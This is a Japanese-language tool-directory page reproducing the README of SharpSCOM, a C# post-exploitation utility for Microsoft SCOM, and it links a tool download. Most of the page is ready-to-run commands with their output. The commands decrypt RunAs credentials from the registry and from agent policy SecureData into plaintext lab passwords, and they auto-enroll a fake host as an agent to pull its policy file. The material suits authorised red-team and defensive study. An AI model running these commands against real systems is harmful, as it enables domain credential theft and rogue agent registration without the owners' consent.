Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/breakfix/sharpscom
認証と認可エクスプロイトなりすましツールポストエクスプロイトペネトレーションテストレッドチーミング
GitHubbreakfix/sharpscom

SharpSCOM

SCOMと対話するためのC#ユーティリティ

リポジトリを見る
100132710ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SharpSCOM

Microsoft System Center Operations Manager(SCOM)と連携するためのC#ツールです。

このツールは、SCOMサーバーバージョン 10.22.10118.0 に対してテスト済みです。

SSPI統合は、BSD-2ライセンスで公開されているKevin Thompson(antiduh)による nsspi ライブラリを介して提供されます。

コマンドラインの使用法

█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █                                                                                 

Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1

Usage: SharpSCOM <command> [options]

Commands:
  RegisterAgent          Register a new agent with SCOM server
  RegisterCertificate    Assign a certificate to an existing agent
  RequestPolicy          Request policy from SCOM server
  DownloadPolicy         Download policy from SCOM server
  AutoEnroll             Send a multi-part request consisting of RegisterAgent, RegisterCertificate and RequestPolicy and attempt to automatically download the policy
  DecryptPolicy          Decrypt SecureData section from a policy file
  DecryptRunAs           Extract and decrypt RunAs credentials from registry

Common Options:
  /hostname:<name>       Computer hostname (default: current machine)
  /managementgroup:<mg>  SCOM management group name
  /server:<server>       SCOM server address
  /port:<port>           SCOM server port (default: 5723)
  /outfile:<file>        Output file path
  /data:<base64>         Base64-encoded data
  /key:<xml>             RSA private key in XML format
  /verbose               Enable verbose output
  /help                  Show this help message

Examples:
  SharpSCOM AutoEnroll /managementgroup:MG1 /server:scom.domain.com
  SharpSCOM DecryptPolicy /data:<base64> /outfile:policy.xml
  SharpSCOM DecryptRunAs

使用例(SCOM登録済みホストでのコマンド)

以下のコマンドは、現在SCOMに登録されているサーバー上で実行することを想定しています。RunAs資格情報が使用されていてサーバーに配布されている場合、以下のコマンドを使用して平文の資格情報を復元できます。

RunAs資格情報の抽出(DPAPI)

レジストリからRunAs資格情報を抽出して復号します(ローカル管理者権限が必要です):

SharpSCOM.exe decryptrunas

█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █

Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1

[+] Searching for RunAs credentials in registry...
[+] Found 4 credentials

Username: ludus\opsmgr_action
Password: Password123

Username: ludus\opsmgr_dataread
Password: Password123

Username: ludus\opsmgr_datawrite
Password: Password123

Username: ludus\runas_account
Password: SuperSecure!

[+] Completed

Policy.xmlのSecureDataからのRunAs資格情報の抽出

エージェントポリシーXMLファイルの SecureData セクションに格納されているRunAs資格情報を抽出して復号します。デフォルトでは、このファイルは C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Connector Configuration Cache\$MANAGEMENT_GROUP_NAME$\OpsMgrConnector.Config にあります。

このコマンドは、Local Machine\Microsoft Monitoring Agent ストアから現在のSCOM RunAs証明書を探し出し、関連付けられた秘密鍵を使用して復号します。

SharpSCOM DecryptPolicy /data:<base64-encrypted-data>


█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █                                                                                     

Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1

[+] Attempting to decrypt policy data...
[+] Using certificate from store
[+] Found certificate in Microsoft Monitoring Agent store
[+] Subject: O=Microsoft, OU=RunAs Account Encryption, CN=scom-db.ludus.domain
[+] Issuer: O=Microsoft, OU=RunAs Account Encryption, CN=scom-db.ludus.domain
[+] Thumbprint: 88D3E2AC575795E5F5F0E0C2EAFFB5FC386EA52F
[+] Key Size: 2048
[+] RSA key loaded successfully from certificate
[+] SecureData decrypted successfully!
<SecureStorageContainer><SecureStorageReferences><Added><SecureStorageReference Identity="63745834-3e54-936c-1b47-2d632054a177"><TargetSSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</TargetSSID></SecureStorageReference></Added><Removed /><Modified /></SecureStorageReferences><SecureStorageElements><Added><SecureStorageElement Type="WindowsCredential"><SSID>00C29753F0583B2A1D9D0D81DF24F0FBA31D72B17A00000000000000000000000000000000000000</SSID><Domain>ludus</Domain><UserName>runas_account</UserName><Password>UwB1AHAAZQByAFMAZQBjAHUAcgBlACEA</Password></SecureStorageElement><SecureStorageElement Type="ActionAccountCredential"><SSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</SSID><Domain>NT Authority</Domain><UserName>LocalSystem</UserName></SecureStorageElement></Added><Removed /><Modified /></SecureStorageElements></SecureStorageContainer>

使用例(SCOM未登録ホストでのコマンド)

現在SCOMに登録されていないドメイン参加済みホストを制御下に置いている場合、以下の要件を満たしていれば、デバイスの登録を試みてエージェントポリシーXMLファイルを要求できます。

要件:

  • コンピュータアカウントとしてのKerberos認証
  • 自動登録が有効であること

新しいデバイスを登録するために、SCOMエージェントは以下の4つのメッセージをSCOMサーバーに送信します。

コマンド説明
RegisterAgentSCOMサーバーに新しいエージェントを登録します
RegisterCertificate既存のエージェントに証明書を割り当てます
RequestPolicySCOMサーバーにポリシーを要求します
DownloadPolicySCOMサーバーからポリシーをダウンロードします

テスト目的であれば、上記の各メッセージは、SharpSCOMの対応するコマンドを使用してSCOMサーバーに個別に送信することもできます。

注: SCOMサーバーは、これらのメッセージをマルチメッセージリクエストの一部としてまとめて受信することを想定しています。エージェントポリシーファイルを確実に受信するには、AutoEnroll コマンドを使用する必要があります。このコマンドは RegisterAgent、RegisterCertificate、RequestPolicy コマンドをマルチパートメッセージとしてまとめて送信します。

AutoEnroll コマンドを送信すると、SCOMサーバーからの応答が自動的に解析され、エージェントポリシーXMLファイルをダウンロードするための最終的な DownloadPolicy メッセージの生成に使用されます。

新しいエージェントの自動登録

SharpSCOM.exe autoenroll /managementgroup:SCOM1 /server:scom-om1.ludus.domain /hostname:fake1.ludus.domain /outfile:C:\Users\domainadmin\desktop\policy_new.xml

█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █

Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
ツールをダウンロード